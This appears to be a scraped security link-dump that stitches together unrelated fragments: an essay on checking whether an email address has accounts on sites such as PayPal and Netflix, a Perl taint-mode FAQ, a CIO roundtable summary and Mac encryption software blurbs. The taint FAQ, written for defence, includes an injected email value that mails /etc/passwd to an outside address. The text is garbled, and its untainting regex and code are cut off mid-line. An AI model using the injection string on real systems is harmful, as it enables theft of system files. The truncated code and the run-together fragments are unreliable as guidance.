Gnupg. Corporation - Home Page. Kantara Initiative: Shaping the Future of Global Identity. Mobile Surveillance-A Primer - MobileActive Wiki. KeePassX - The Official KeePassX Homepage. How Private Are Sites' Membership Lists? Something like this is actually possible with quite a few well-known sites -- given a person's e-mail address, it is possible to find out if they have an account with Match.com, PayPal, Netflix, eBay, Amazon, and Google (and, by the way, Slashdot [CT: We'd fix it if I thought it mattered]).
For some of those sites, it may even be possible to take a long list of e-mail addresses and use an automated process to find out which of those addresses have accounts with those sites (something I didn't want to risk trying myself, but as a general rule, if you can do it once, you can do it many times, at least if you do it slowly enough). It does not enable the attacker to extract addresses from a site's membership rolls, which is a much more serious type of breach -- in this case, the attacker would have to already know a list of e-mail addresses, and would only be able to find out which of those addresses have accounts with a given service. Try to create a new account with that e-mail address. Using mod_ssl on Mac OS X. News: Net Pioneer Wants New Internet. SecuriTeam.com. CGI/Perl Taint Mode FAQ. For example, if $form_data{"email"} is "tainted", then the following would still be legal: print $form_data{"email"} .
"\n"; because the print command is not an unsafe operation. But if you try to pass the same variable to an unsafe version of a system call system("mail " . Perl will complain and not allow this. "me@mydomain.com; mail hacker@hack.net < /etc/passwd" Clearly, there are security ramifications. Thus, if you want to do that type of command with a user supplied variable, you must always untaint it regardless of whether it contains harmless input or not. To untaint a variable, you use regular expressions.
The only way to untaint a variable is to do a regular expression match using () groups inside the regular expression pattern match. Perl considers these new variables that arise from () groups to be untainted. The following will illustrate this: EMail addresses consist of word characters (a-zA-Z_0-9), dashes, periods and an @ sign. /\w{1}[\w-.] $email = $form_data{"email"}; OK. No. Secunia - Vulnerability and Virus Information. Security Summit. Network World - Can security be a competitive advantage?
Are security and privacy at odds with speed and collaboration? How has Sarbanes-Oxley complicated the security challenge? And how do you balance risk and security? Those are just some of the pressing questions 23 prominent IT executives and academics addressed at a recent daylong executive roundtable at Dartmouth College in Hanover, N.H.
The Thought Leadership Summit on Digital Strategies is an ongoing series of discussions for Fortune 500 CIOs and vice presidents focused on the business issues they face and the enabling role of IT. Participants represented some of the largest and most well-known companies in the U.S., including Fidelity, Staples, Citigroup, Owens-Corning, IBM, General Motors, Hasbro and Cisco . The executives shared with peers their security fears, goals, frustrations and challenges. There was widespread agreement on that point, but several participants noted that sometimes they can't avoid it. M. Macintosh Security Site -> SubRosa Utilities easy-to-use encryption and shredding software for Mac OS and X.
SubRosa Utilities (encryption/decryption file deletion) Information: SubRosa Vol 1-File Utilities is SubRosaSoft.com Ltd's first line of privacy products which help Macintosh users secure themselves and their personal data.
The suite of software to protect your files consist of the following; file and folder encryption, multi-pass shredder, and free decryptor. Each one of these programs make it easy enough for any Mac user to enforse digital security on the personal data that is stored on the computer. SubRosa Encryptor The SubRosa Encryptor allows you to take files or folders and convert them into a encrypted archive that you can store safely using 128 bit key encryption.
The archives are made in a format which allows users to transfer them over the Internet without being currupted upon arrival. Your friend or family can easily decrypt the files by downloading the SubRosa decryptor for free from the FWB web page. The default overwrite policy is set at 3, which is considered most secure.